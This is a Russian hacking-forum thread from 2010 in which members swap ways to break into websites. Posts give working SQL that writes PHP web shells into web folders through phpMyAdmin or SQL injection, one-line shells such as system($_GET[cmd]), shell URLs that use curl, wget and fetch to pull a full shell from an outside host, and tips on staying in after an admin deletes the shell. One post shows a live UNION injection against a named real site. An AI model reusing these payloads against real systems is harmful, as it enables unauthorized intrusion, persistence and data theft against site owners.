Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Serafim

    Serafim Elder - Старейшина

    Joined:
    24 Oct 2006
    Messages:
    184
    Likes Received:
    104
    Reputations:
    18
    Есть права модера и vbulletin 4.0.2 , пробовал все способы со старых версий- не работают.
    Жду предложений по этому поводу. :rolleyes:
     
    #12041 Serafim, 28 Mar 2010
    Last edited: 28 Mar 2010
  2. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    скорее всего нехватает прав...
     
  3. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    а у меня такой вопрос как залить шелл через phpmyadmin желательно подробно...
     
  4. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    CREATE DATABASE `shell upload`;
    CREATE TABLE `shell upload`.`hack` (`shell` TEXT);
    INSERT INTO `shell upload`.`hack` (`shell`) VALUES ('<?php eval($_GET[c]); ?>');

    Ищем папку с правами на запись uploads,images,etc.

    Делаем запрос:

    SELECT `shell` FROM `shell upload`.`hack` INTO OUTFILE '/home/сайт/www/uploads/shell.php';

    Либо можно заинклудить шелл с удаленного хоста:

    INSERT INTO `shell upload`.`hack` (`shell`) VALUES ("<?php include('http://сайт с шеллом'); ?>");

    Для этого способа директива allow_url_include должна находиться в положении On
     
    #12044 h00lyshit!, 28 Mar 2010
    Last edited: 11 Mar 2011
    1 person likes this.
  5. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    SELECT '<? system($_GET[cmd]); ?>' from mysql.user into outfile '/var/www/html/site/tmp/shel.php';

    www.site.com/shel.php?cmd=ls
    shel.php?cmd=curl --output /papka/na/servere/shell.php http://www.site.ru/shell.txt
    shel.php?cmd=wget -o /papka/na/servere/shell.php http://www.site/shell.txt
    shel.php?cmd=get http://www.site.ru/shell.txt > /papka/na/servere/shell.php
    shel.php?cmd=fetch -o /papka/na/servere/shell.php http://www.site.ru/shell.txt

    путь нужен полюбом
     
    1 person likes this.
  6. 547

    547 Active Member

    Joined:
    11 Oct 2009
    Messages:
    216
    Likes Received:
    105
    Reputations:
    50
    ну да, но меня интересовало как залить шелл именно через phpmyadmin.
    спсасибо но я уже разобрался:) просто ты похоже описал как залить шелл через сиквел инжекцию...

    кстати единственное с чем возникла трудность при заливке так это синтаксис:)
    select * from 'table' into outfile 'путь' -не правильно
    select * from `table` into outfile 'путь' -так правильно
    а весь прикол в кавычках оказалсо:)

    ппц. я в шоке ну и админ попался 4 раз шелл лью а он его удаляет!!! при всем том что код обфусцирован... и сам файл я вроде переименовывал,прятал...
    как можно по другому остатся в системе?
     
    #12046 547, 29 Mar 2010
    Last edited: 29 Mar 2010
  7. h00lyshit!

    h00lyshit! [From Nobody To Root]

    Joined:
    10 Sep 2009
    Messages:
    289
    Likes Received:
    290
    Reputations:
    195
    Возможно на сервере кроном гоняеться скрипт, который дропает файлы по дате создания и весу.
     
  8. Дирижабль

    Дирижабль [ ✯✯✯ Ядерный Суицид ✯✯✯ ]

    Joined:
    6 Jan 2010
    Messages:
    369
    Likes Received:
    346
    Reputations:
    292
    o_O а по человечески можешь объяснить?
     
    _________________________
  9. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    547 ты не прав, я описал именно как залить шелл через пхпмайадмин, обращатся все равно через БД, поэтому и синтаксис одинаковый, я не раз заливал через пхпадмина именно так, конечно нужен юзер рут и папка с правами на запись и соответсвенно сам путь до папки.

    а по поводу как спрятать шелл от злобного админа есть способ который описал Dimi4 ..вот собственно и link
    смотри в самом низу статьи
     
  10. Serafim

    Serafim Elder - Старейшина

    Joined:
    24 Oct 2006
    Messages:
    184
    Likes Received:
    104
    Reputations:
    18
    Что еще объяснять? Есть аккаунты модератора на двух форумах- vbulletin 4.0.2 и vbulletin 3.8.5. Нужно залить шелл. Старые баги с заливкой через предупреждения и репутацию- не работают. :(
     
  11. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    как раскручивать скули, если значение не int ?
    например,
    view_all.php?part=analit'

    ошибка :

     
  12. Jerri

    Jerri Level 8

    Joined:
    12 Jul 2009
    Messages:
    137
    Likes Received:
    376
    Reputations:
    22
    Так же как и всегда.
     
    #12052 Jerri, 29 Mar 2010
    Last edited: 29 Mar 2010
    1 person likes this.
  13. Mondeo11

    Mondeo11 New Member

    Joined:
    24 Feb 2010
    Messages:
    0
    Likes Received:
    1
    Reputations:
    0
    ---
     
    #12053 Mondeo11, 29 Mar 2010
    Last edited: 31 Mar 2010
    1 person likes this.
  14. попугай

    попугай Elder - Старейшина

    Joined:
    15 Jan 2008
    Messages:
    1,588
    Likes Received:
    405
    Reputations:
    196

    для начала, узнать алгоритм шифрования
     
  15. jecka3000

    jecka3000 Elder - Старейшина

    Joined:
    15 Mar 2008
    Messages:
    372
    Likes Received:
    54
    Reputations:
    4
    ребят, хочу залить шелл посредством SQL, а именно:

    union+select+1,'<?php код вашего шелла ?>',3,4,5,6,7,8+into+DUMPFILE+'/путь/до/вашего/будующего/шелла/shell.php'/*

    php код вашего шелла - сюда не вариант ведь пихать весь код, например, шелла от madnet'a.
    Посоветуйте, какой "мини" шелл или команду выполнить там, чтобы потом можно было залить полноценный шелл?
     
  16. Rubaka

    Rubaka Elder - Старейшина

    Joined:
    2 Sep 2007
    Messages:
    263
    Likes Received:
    150
    Reputations:
    28
    <?
    echo "<pre>";
    system($_GET["id"]);
    echo "</pre>";
    ?>

    вот и весь шелл)))
     
    1 person likes this.
  17. Gorev

    Gorev Level 8

    Joined:
    31 Mar 2006
    Messages:
    2,548
    Likes Received:
    1,244
    Reputations:
    273
    <? system($_GET[cmd]); ?>
     
    1 person likes this.
  18. apolon47

    apolon47 Banned

    Joined:
    13 Apr 2009
    Messages:
    120
    Likes Received:
    14
    Reputations:
    4
    нашел sql уязвимость

    выдает ошибку
    PHP:
    SQL query SELECT FROM mobiticket.structure_page WHERE tag '595'' AND status = 'active' failed with error 1064: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'active'' at line 3
    после SELECT * FROM mobiticket.structure_page WHERE tag = '595'' идет AND

    до AND сработает union? /* не обрыв строки? спасибо!
     
    #12058 apolon47, 29 Mar 2010
    Last edited: 29 Mar 2010
  19. street16

    street16 Elder - Старейшина

    Joined:
    18 Sep 2006
    Messages:
    42
    Likes Received:
    5
    Reputations:
    1
    http://themood.ru/index.php?pr=15'
    Полскажите пожалуйста есть ли тут инъекция?все уже перепробывал.Если нет то почему ошибка выскакивает?спасибо!
     
  20. _iks_

    _iks_ Member

    Joined:
    21 Feb 2009
    Messages:
    60
    Likes Received:
    59
    Reputations:
    61
    http://themood.ru/index.php?pr=1500+union+select+1,2,3,concat(version(),0x3a,user(),0x3a,database()),5,6
     
    2 people like this.
Loading...
Thread Status:
Not open for further replies.